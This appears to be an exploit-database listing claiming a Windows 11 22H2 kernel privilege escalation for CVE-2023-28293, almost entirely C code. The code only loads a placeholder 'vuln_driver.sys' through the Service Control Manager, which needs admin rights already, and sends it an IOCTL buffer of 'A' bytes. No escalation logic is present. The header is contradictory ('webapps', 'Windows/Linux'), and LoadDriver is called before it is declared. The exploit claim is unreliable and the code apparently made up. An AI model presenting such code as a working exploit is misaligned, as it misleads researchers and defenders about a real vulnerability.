Headline
Microsoft Windows 11 22h2 Kernel Privilege Escalation
Microsoft Microsoft Windows 11 version 22h2 suffers from a kernel privilege escalation vulnerability.
// Exploit Title: Windows 11 22h2 - Kernel Privilege Elevation// Date: 2023-06-20// country: Iran// Exploit Author: Amirhossein Bahramizadeh// Category : webapps// Vendor Homepage:// Tested on: Windows/Linux// CVE : CVE-2023-28293#include <windows.h>#include <stdio.h>// The vulnerable driver file nameconst char *driver_name = "vuln_driver.sys";// The vulnerable driver device nameconst char *device_name = "\\\\.\\VulnDriver";// The IOCTL code to trigger the vulnerability#define IOCTL_VULN_CODE 0x222003// The buffer size for the IOCTL input/output data#define IOCTL_BUFFER_SIZE 0x1000int main(){ HANDLE device; DWORD bytes_returned; char input_buffer[IOCTL_BUFFER_SIZE]; char output_buffer[IOCTL_BUFFER_SIZE]; // Load the vulnerable driver if (!LoadDriver(driver_name, "\\Driver\\VulnDriver")) { printf("Error loading vulnerable driver: %d\n", GetLastError()); return 1; } // Open the vulnerable driver device device = CreateFile(device_name, GENERIC_READ | GENERIC_WRITE, 0, NULL, OPEN_EXISTING, FILE_ATTRIBUTE_NORMAL, NULL); if (device == INVALID_HANDLE_VALUE) { printf("Error opening vulnerable driver device: %d\n", GetLastError()); return 1; } // Fill the input buffer with data to trigger the vulnerability memset(input_buffer, 'A', IOCTL_BUFFER_SIZE); // Send the IOCTL to trigger the vulnerability if (!DeviceIoControl(device, IOCTL_VULN_CODE, input_buffer, IOCTL_BUFFER_SIZE, output_buffer, IOCTL_BUFFER_SIZE, &bytes_returned, NULL)) { printf("Error sending IOCTL: %d\n", GetLastError()); return 1; } // Print the output buffer contents printf("Output buffer:\n%s\n", output_buffer); // Unload the vulnerable driver if (!UnloadDriver("\\Driver\\VulnDriver")) { printf("Error unloading vulnerable driver: %d\n", GetLastError()); return 1; } // Close the vulnerable driver device CloseHandle(device); return 0;}BOOL LoadDriver(LPCTSTR driver_name, LPCTSTR service_name){ SC_HANDLE sc_manager, service; DWORD error; // Open the Service Control Manager sc_manager = OpenSCManager(NULL, NULL, SC_MANAGER_ALL_ACCESS); if (sc_manager == NULL) { return FALSE; } // Create the service service = CreateService(sc_manager, service_name, service_name, SERVICE_ALL_ACCESS, SERVICE_KERNEL_DRIVER, SERVICE_DEMAND_START, SERVICE_ERROR_NORMAL, driver_name, NULL, NULL, NULL, NULL, NULL); if (service == NULL) { error = GetLastError(); if (error == ERROR_SERVICE_EXISTS) { // The service already exists, so open it instead service = OpenService(sc_manager, service_name, SERVICE_ALL_ACCESS); if (service == NULL) { CloseServiceHandle(sc_manager); return FALSE; } } else { CloseServiceHandle(sc_manager); return FALSE; } } // Start the service if (!StartService(service, 0, NULL)) { error = GetLastError(); if (error != ERROR_SERVICE_ALREADY_RUNNING) { CloseServiceHandle(service); CloseServiceHandle(sc_manager); return FALSE; } } CloseServiceHandle(service); CloseServiceHandle(sc_manager); return TRUE;}BOOL UnloadDriver(LPCTSTR service_name){ SC_HANDLE sc_manager, service; SERVICE_STATUS status; DWORD error; // Open the Service Control Manager sc_manager = OpenSCManager(NULL, NULL, SC_MANAGER_ALL_ACCESS); if (sc_manager == NULL) { return FALSE; } // Open the service service = OpenService(sc_manager, service_name, SERVICE_ALL_ACCESS); if (service == NULL) { CloseServiceHandle(sc_manager); return FALSE; } // Stop the service if (!ControlService(service, SERVICE_CONTROL_STOP, &status)) { error = GetLastError(); if (error != ERROR_SERVICE_NOT_ACTIVE) { CloseServiceHandle(service); CloseServiceHandle(sc_manager); return FALSE; } } // Delete the service if (!DeleteService(service)) { CloseServiceHandle(service); CloseServiceHandle(sc_manager); return FALSE; } CloseServiceHandle(service); CloseServiceHandle(sc_manager); return TRUE;}Related news
CVE-2023-28293
Windows Kernel Elevation of Privilege Vulnerability